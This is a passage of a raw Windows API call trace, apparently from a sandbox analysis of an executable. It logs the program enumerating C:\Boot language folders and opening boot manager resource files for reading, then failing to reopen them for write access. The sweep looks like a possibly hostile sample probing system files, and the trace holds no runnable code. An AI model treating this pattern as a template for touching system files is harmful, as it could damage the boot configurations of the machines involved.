(lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.262] GetLastError () returned 0x5 [0070.262] GetLastError () returned 0x5 [0070.262] SetLastError (dwErrCode=0x5) [0070.262] GetLastError () returned 0x5 [0070.262] SetLastError (dwErrCode=0x5) [0070.262] GetLastError () returned 0x5 [0070.262] SetLastError (dwErrCode=0x5) [0070.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0070.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0070.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.262] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.262] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.262] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fdc0d7, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0070.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0070.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0070.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0070.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0070.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0070.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0070.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0070.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0070.263] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.263] AreFileApisANSI () returned 1 [0070.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ko-KR\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ko-KR\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.263] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0070.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0070.263] AreFileApisANSI () returned 1 [0070.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.263] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0070.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ko-KR\\memtest.exe.mui") returned 30 [0070.263] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.264] GetFileType (hFile=0x41c) returned 0x1 [0070.264] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0070.264] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.264] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.264] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.264] CloseHandle (hObject=0x41c) returned 1 [0070.264] AreFileApisANSI () returned 1 [0070.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.265] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0070.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ko-KR\\memtest.exe.mui") returned 30 [0070.265] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\memtest.exe.mui" (normalized: "c:\\boot\\ko-kr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.265] GetLastError () returned 0x5 [0070.265] GetLastError () returned 0x5 [0070.265] SetLastError (dwErrCode=0x5) [0070.265] GetLastError () returned 0x5 [0070.265] SetLastError (dwErrCode=0x5) [0070.265] GetLastError () returned 0x5 [0070.265] SetLastError (dwErrCode=0x5) [0070.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0070.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.265] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.265] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.265] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.265] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68f48, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓Ꞡ")) returned 0 [0070.266] FindClose (in: hFindFile=0x782d0 | out: hFindFile=0x782d0) returned 1 [0070.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0070.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0070.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0070.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0070.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0070.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0070.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.266] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.266] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.266] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.266] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.266] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.266] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.266] AreFileApisANSI () returned 1 [0070.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\lt-LT", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\lt-LT", lpUsedDefaultChar=0x0) returned 14 [0070.266] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.266] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0070.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0070.267] AreFileApisANSI () returned 1 [0070.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88810 [0070.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88810, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\lt-LT") returned 14 [0070.267] CreateFileW (lpFileName="C:\\Boot\\lt-LT" (normalized: "c:\\boot\\lt-lt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.267] GetLastError () returned 0x5 [0070.267] GetLastError () returned 0x5 [0070.267] SetLastError (dwErrCode=0x5) [0070.267] GetLastError () returned 0x5 [0070.267] SetLastError (dwErrCode=0x5) [0070.267] GetLastError () returned 0x5 [0070.267] SetLastError (dwErrCode=0x5) [0070.267] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.267] AreFileApisANSI () returned 1 [0070.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.267] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88748 [0070.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88748, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\lt-LT") returned 14 [0070.267] CreateFileW (lpFileName="C:\\Boot\\lt-LT" (normalized: "c:\\boot\\lt-lt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.268] GetLastError () returned 0x5 [0070.268] GetLastError () returned 0x5 [0070.268] SetLastError (dwErrCode=0x5) [0070.268] GetLastError () returned 0x5 [0070.268] SetLastError (dwErrCode=0x5) [0070.268] GetLastError () returned 0x5 [0070.268] SetLastError (dwErrCode=0x5) [0070.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0070.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.268] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.268] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.268] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.268] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.268] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0070.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0070.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0070.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.268] FindFirstFileExW (in: lpFileName="C:\\Boot\\lt-LT\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78710 [0070.268] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.268] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.268] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.268] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46128 [0070.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0070.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0070.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0070.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0070.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0070.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0070.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.269] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.269] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.269] AreFileApisANSI () returned 1 [0070.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\lt-LT\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\lt-LT\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.269] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.270] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.270] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0070.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0070.270] AreFileApisANSI () returned 1 [0070.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0070.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\lt-LT\\bootmgr.exe.mui") returned 30 [0070.270] CreateFileW (lpFileName="C:\\Boot\\lt-LT\\bootmgr.exe.mui" (normalized: "c:\\boot\\lt-lt\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.271] GetFileType (hFile=0x41c) returned 0x1 [0070.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0070.271] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, 